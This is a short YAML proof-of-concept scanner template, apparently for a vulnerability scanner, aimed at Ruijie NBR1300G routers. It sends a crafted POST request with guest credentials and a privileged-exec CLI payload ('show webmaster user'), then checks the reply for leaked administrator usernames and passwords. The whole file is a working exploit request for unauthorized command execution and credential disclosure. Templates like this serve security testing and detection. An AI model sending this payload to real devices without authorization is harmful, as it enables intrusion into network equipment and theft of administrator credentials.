name: poc-yaml-ruijie-nbr1300g-cli-password-leak
rules:
  - method: POST
    path: /WEB_VMS/LEVEL15/
    follow_redirects: false
    headers:
      Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
    body: |
      command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
    expression: |
      response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest"))
detail:
  author: abbin777
  links:
    - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
